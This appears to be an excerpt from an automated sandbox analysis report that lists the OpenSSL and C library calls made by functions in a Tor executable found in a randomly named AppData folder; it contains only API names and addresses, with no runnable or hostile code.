                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D41D0 __stack_chk_fail,CRYPTO_malloc,memcpy,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,25_2_6C0D41D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C2234 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,25_2_6C0C2234
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA230 CRYPTO_THREAD_run_once,25_2_6C0AA230
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C6230 memchr,CRYPTO_free,CRYPTO_strndup,25_2_6C0C6230
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C092236 CRYPTO_zalloc,CRYPTO_free,25_2_6C092236
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CE246 CRYPTO_free,25_2_6C0CE246
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C09C260 memset,__stack_chk_fail,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,COMP_expand_block,CRYPTO_malloc,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,strncmp,strncmp,strncmp,__stack_chk_fail,25_2_6C09C260
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C092263 CRYPTO_zalloc,25_2_6C092263
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC279 EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,25_2_6C0CC279
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0AA286 COMP_get_type,CRYPTO_mem_ctrl,CRYPTO_malloc,CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_push,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,ERR_put_error,CRYPTO_mem_ctrl,CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,25_2_6C0AA286
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E4297 HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,EVP_DecryptUpdate,EVP_DecryptFinal,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,EVP_DecryptInit_ex,25_2_6C0E4297
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DA2A0 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,__stack_chk_fail,25_2_6C0DA2A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0EA2B1 BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,25_2_6C0EA2B1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A02C0 CRYPTO_clear_free,25_2_6C0A02C0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D22D0 CRYPTO_malloc,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0D22D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0B22F9 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,25_2_6C0B22F9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CC30C EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,25_2_6C0CC30C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E0328 CRYPTO_free,CRYPTO_memdup,25_2_6C0E0328
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A5160 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C0A5160
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E5180 CRYPTO_free,25_2_6C0E5180
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB1C9 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB1C9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF1C4 CRYPTO_free,25_2_6C0CF1C4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0E11D0 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,OPENSSL_cleanse,__stack_chk_fail,CRYPTO_malloc,memcpy,memcpy,CRYPTO_malloc,memcpy,memcmp,memcmp,memcmp,ERR_put_error,CRYPTO_clear_free,ERR_put_error,25_2_6C0E11D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BF1FC __stack_chk_fail,CRYPTO_free,25_2_6C0BF1FC
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D31F0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D31F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD20B CRYPTO_free,CRYPTO_strdup,25_2_6C0BD20B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB203 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB203
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A524B X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,25_2_6C0A524B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB241 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB241
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D3256 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,25_2_6C0D3256
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB256 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,ERR_put_error,25_2_6C0BB256
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C095280 CRYPTO_zalloc,ERR_put_error,25_2_6C095280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A9280 ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_value,OPENSSL_sk_push,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,CRYPTO_free,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,__stack_chk_fail,BIO_snprintf,CRYPTO_malloc,ERR_put_error,25_2_6C0A9280
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0C72E0 time,EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key,EVP_sha256,EVP_DigestSignInit,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,EVP_MD_CTX_free,EVP_PKEY_free,EVP_MD_CTX_free,EVP_PKEY_free,__stack_chk_fail,25_2_6C0C72E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A52F0 EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0A52F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0A531B EVP_PKEY_free,X509_free,EVP_PKEY_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,25_2_6C0A531B
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D5336 EVP_PKEY_size,BIO_free,EVP_MD_CTX_free,CRYPTO_free,EVP_PKEY_id,25_2_6C0D5336
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BD340 CRYPTO_free,CRYPTO_memdup,25_2_6C0BD340
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DB340 OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_num,OPENSSL_sk_value,memcmp,OPENSSL_sk_value,OPENSSL_sk_num,memcpy,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_value,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_value,__stack_chk_fail,CRYPTO_memcmp,25_2_6C0DB340
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0D9361 EVP_MD_CTX_new,strlen,EVP_PKEY_security_bits,BN_num_bits,BN_bn2bin,EVP_PKEY_size,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,BN_num_bits,BN_num_bits,memset,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,EVP_PKEY_new,EVP_PKEY_assign,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,DH_free,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_pqg,DH_get0_key,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,CRYPTO_free,CRYPTO_malloc,RAND_bytes,__stack_chk_fail,25_2_6C0D9361
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0DF387 CRYPTO_clear_free,EVP_PKEY_free,25_2_6C0DF387
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0CF3A4 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C0CF3A4
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C0BB3F0 CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_clear_free,25_2_6C0BB3F0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4FA0 CRYPTO_free,CRYPTO_free,free,CRYPTO_free,25_2_6C1A4FA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC0A0 BUF_MEM_free,CRYPTO_secure_clear_free,CRYPTO_free,CRYPTO_clear_free,free,25_2_6C1DC0A0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DC120 BUF_MEM_grow,CRYPTO_secure_malloc,memcpy,CRYPTO_secure_clear_free,CRYPTO_realloc,malloc,memset,memset,ERR_put_error,25_2_6C1DC120
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29F1D0 CRYPTO_zalloc,CRYPTO_malloc,malloc,memset,25_2_6C29F1D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B32D0 BIO_free,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,free,25_2_6C1B32D0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C29D3E0 OPENSSL_LH_insert,CRYPTO_realloc,memset,CRYPTO_malloc,malloc,__stack_chk_fail,OPENSSL_LH_delete,CRYPTO_free,CRYPTO_realloc,__stack_chk_fail,25_2_6C29D3E0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6C14 CRYPTO_free,BN_is_negative,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6C14
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0C00 CRYPTO_free,CRYPTO_malloc,__stack_chk_fail,25_2_6C1D0C00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C202C00 DH_meth_dup,CRYPTO_malloc,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C202C00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAC39 CRYPTO_THREAD_get_local,CRYPTO_free,OPENSSL_sk_push,25_2_6C1AAC39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEC30 CAST_cfb64_encrypt,CAST_encrypt,CAST_encrypt,__stack_chk_fail,CAST_ecb_encrypt,CAST_encrypt,CAST_decrypt,__stack_chk_fail,25_2_6C1DEC30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C27AC10 EVP_Digest,CRYPTO_zalloc,EVP_MD_CTX_set_flags,EVP_DigestInit_ex,EVP_MD_CTX_reset,CRYPTO_free,EVP_MD_CTX_set_flags,OPENSSL_cleanse,OPENSSL_die,EVP_MD_CTX_ctrl,25_2_6C27AC10
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6C47 CRYPTO_free,BN_div_word,BN_is_zero,BIO_snprintf,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6C47
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECC70 CMS_EncryptedData_decrypt,CMS_get0_type,OBJ_obj2nid,CMS_EncryptedData_set1_key,CMS_dataInit,BIO_pop,BIO_free,CMS_get0_content,ERR_put_error,ERR_put_error,BIO_free_all,25_2_6C1ECC70
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C296CB0 CRYPTO_new_ex_data,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_THREAD_unlock,OPENSSL_sk_num,OPENSSL_sk_value,CRYPTO_free,CRYPTO_malloc,CRYPTO_THREAD_unlock,ERR_put_error,ERR_put_error,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C296CB0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1CEC80 CRYPTO_zalloc,memcpy,CRYPTO_clear_free,CRYPTO_secure_zalloc,CRYPTO_secure_clear_free,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C1CEC80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E6C80 EVP_CIPHER_CTX_key_length,EVP_PKEY_derive,EVP_CipherInit_ex,OPENSSL_cleanse,CRYPTO_free,EVP_CIPHER_CTX_reset,EVP_PKEY_CTX_free,EVP_CipherUpdate,CRYPTO_malloc,EVP_CipherUpdate,OPENSSL_cleanse,OPENSSL_cleanse,__stack_chk_fail,CMS_RecipientInfo_kari_get0_alg,ERR_put_error,25_2_6C1E6C80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2ACC90 OPENSSL_hexstr2buf,strlen,CRYPTO_malloc,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,25_2_6C2ACC90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1F4CA0 i2o_SCT,memcpy,CRYPTO_malloc,memcpy,ERR_put_error,CRYPTO_free,ERR_put_error,__stack_chk_fail,25_2_6C1F4CA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C30CCF0 UI_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,UI_get_default_method,CRYPTO_new_ex_data,UI_null,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_free,25_2_6C30CCF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C272CE0 CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,25_2_6C272CE0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6CD1 CRYPTO_free,BIO_snprintf,CRYPTO_free,BN_free,25_2_6C1D6CD1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C202CF0 DH_meth_set1_name,CRYPTO_strdup,CRYPTO_free,ERR_put_error,25_2_6C202CF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACCC3 CRYPTO_strndup,25_2_6C1ACCC3
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18ACF9 CRYPTO_malloc,memcpy,CRYPTO_free,25_2_6C18ACF9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FACF0 DES_decrypt3,DES_encrypt2,DES_encrypt2,DES_encrypt2,25_2_6C1FACF0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ACCE1 CRYPTO_strndup,CRYPTO_strndup,strlen,25_2_6C1ACCE1
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1EAD00 CMS_SignerInfo_verify,OBJ_obj2nid,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestVerifyInit,ASN1_item_i2d,EVP_DigestUpdate,CRYPTO_free,EVP_DigestVerifyFinal,ERR_put_error,ERR_put_error,EVP_MD_CTX_reset,EVP_MD_CTX_new,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,25_2_6C1EAD00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4D34 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C1A4D34
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D6D51 CRYPTO_free,BN_free,25_2_6C1D6D51
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1E2D50 CMAC_resume,EVP_EncryptInit_ex,25_2_6C1E2D50
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18ED43 CRYPTO_clear_free,CRYPTO_clear_free,25_2_6C18ED43
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1A4D47 OPENSSL_sk_num,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,25_2_6C1A4D47
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAD6C CRYPTO_zalloc,BUF_MEM_new_ex,CRYPTO_zalloc,CRYPTO_free,BUF_MEM_free,CRYPTO_free,25_2_6C1BAD6C
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2D0DA0 RAND_DRBG_get0_private,CRYPTO_THREAD_run_once,CRYPTO_THREAD_get_local,RAND_DRBG_instantiate,CRYPTO_THREAD_set_local,CRYPTO_THREAD_lock_free,CRYPTO_free_ex_data,CRYPTO_secure_clear_free,CRYPTO_clear_free,25_2_6C2D0DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1AAD80 CRYPTO_THREAD_get_local,DeleteFiber,OPENSSL_sk_pop,CRYPTO_free,DeleteFiber,CRYPTO_free,OPENSSL_sk_pop,OPENSSL_sk_free,CRYPTO_free,CRYPTO_THREAD_set_local,CRYPTO_THREAD_get_local,CRYPTO_THREAD_set_local,CRYPTO_free,25_2_6C1AAD80
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EDB8 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,25_2_6C18EDB8
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1D0DBB CRYPTO_malloc,25_2_6C1D0DBB
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C28AD90 EVP_DecryptUpdate,EVP_CIPHER_CTX_test_flags,ERR_put_error,ERR_put_error,memcpy,memcpy,EVP_CIPHER_flags,ERR_put_error,OPENSSL_die,EVP_DecryptFinal,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,EVP_DecryptFinal_ex,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,OPENSSL_die,25_2_6C28AD90
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C192DA0 ASN1_TIME_set_string_X509,strlen,ASN1_UTCTIME_check,ASN1_STRING_copy,CRYPTO_free,ASN1_GENERALIZEDTIME_check,CRYPTO_zalloc,memcpy,__stack_chk_fail,ASN1_TIME_to_tm,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_diff,time,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_print,BIO_printf,BIO_write,BIO_printf,__stack_chk_fail,ASN1_TIME_cmp_time_t,OPENSSL_gmtime,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TIME_normalize,ASN1_STRING_set,time,OPENSSL_gmtime,ASN1_STRING_new,ASN1_STRING_set,BIO_snprintf,ASN1_STRING_set,ASN1_STRING_free,__stack_chk_fail,ASN1_TIME_compare,OPENSSL_gmtime_diff,time,OPENSSL_gmtime,time,OPENSSL_gmtime,__stack_chk_fail,ASN1_TYPE_get,25_2_6C192DA0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1B6DD0 ERR_put_error,BIO_clear_flags,BIO_clear_flags,ERR_put_error,CRYPTO_free,ERR_put_error,CRYPTO_malloc,CRYPTO_malloc,__stack_chk_fail,ERR_put_error,25_2_6C1B6DD0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEDC0 CAST_ecb_encrypt,CAST_encrypt,25_2_6C1DEDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1ECDC0 CMS_EncryptedData_encrypt,CMS_ContentInfo_new,CMS_EncryptedData_set1_key,CMS_dataInit,SMIME_crlf_copy,BIO_ctrl,CMS_dataFinal,BIO_free_all,CMS_set_detached,ERR_put_error,CMS_ContentInfo_free,ERR_put_error,ERR_put_error,BIO_free_all,25_2_6C1ECDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C18EDF9 CRYPTO_clear_free,CRYPTO_clear_free,ERR_put_error,25_2_6C18EDF9
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C28CDC0 EVP_PBE_CipherInit,OBJ_obj2nid,OPENSSL_sk_find,OPENSSL_sk_value,strlen,OBJ_nid2sn,EVP_get_cipherbyname,OBJ_nid2sn,EVP_get_digestbyname,OBJ_bsearch_,ERR_put_error,i2t_ASN1_OBJECT,ERR_add_error_data,OPENSSL_strlcpy,ERR_put_error,ERR_put_error,ERR_put_error,__stack_chk_fail,EVP_PBE_alg_add_type,CRYPTO_malloc,OPENSSL_sk_push,CRYPTO_free,ERR_put_error,OPENSSL_sk_new,25_2_6C28CDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C2AEDC0 OBJ_sn2nid,OPENSSL_LH_retrieve,strcmp,__stack_chk_fail,OBJ_txt2obj,OBJ_sn2nid,OBJ_ln2nid,a2d_ASN1_OBJECT,ASN1_object_size,CRYPTO_malloc,ASN1_put_object,a2d_ASN1_OBJECT,d2i_ASN1_OBJECT,CRYPTO_free,OPENSSL_LH_retrieve,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C2AEDC0
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAE11 CRYPTO_free,25_2_6C1BAE11
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C270E30 ENGINE_pkey_asn1_find_str,CRYPTO_THREAD_run_once,CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,ERR_put_error,__stack_chk_fail,25_2_6C270E30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C19CE00 i2a_ASN1_STRING,BIO_write,BIO_write,BIO_write,__stack_chk_fail,a2i_ASN1_STRING,BIO_gets,OPENSSL_hexchar2int,OPENSSL_hexchar2int,ERR_put_error,CRYPTO_free,BIO_gets,CRYPTO_realloc,ERR_put_error,ERR_put_error,ERR_put_error,25_2_6C19CE00
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1BAE39 BUF_MEM_free,CRYPTO_free,25_2_6C1BAE39
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1C6E30 BN_BLINDING_new,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_THREAD_get_current_id,BN_dup,BN_dup,BN_dup,BN_get_flags,BN_set_flags,BN_free,BN_free,BN_free,BN_free,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,25_2_6C1C6E30
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C194E20 EVP_PKEY_asn1_add_alias,CRYPTO_zalloc,OPENSSL_sk_find,OPENSSL_sk_push,OPENSSL_sk_sort,25_2_6C194E20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1FAE20 DES_ncbc_encrypt,DES_encrypt1,DES_encrypt1,DES_encrypt1,25_2_6C1FAE20
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C190E40 ASN1_STRING_print_ex,ASN1_tag2str,strlen,BIO_write,__stack_chk_fail,ASN1_STRING_print_ex_fp,fwrite,fwrite,ASN1_tag2str,strlen,fwrite,fwrite,i2d_ASN1_TYPE,CRYPTO_malloc,i2d_ASN1_TYPE,fwrite,CRYPTO_free,CRYPTO_free,ERR_put_error,__stack_chk_fail,ASN1_STRING_to_UTF8,ASN1_mbstring_copy,__stack_chk_fail,25_2_6C190E40
                Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exeCode function: 25_2_6C1DEE40 CAST_encrypt,25_2_6C1DEE40
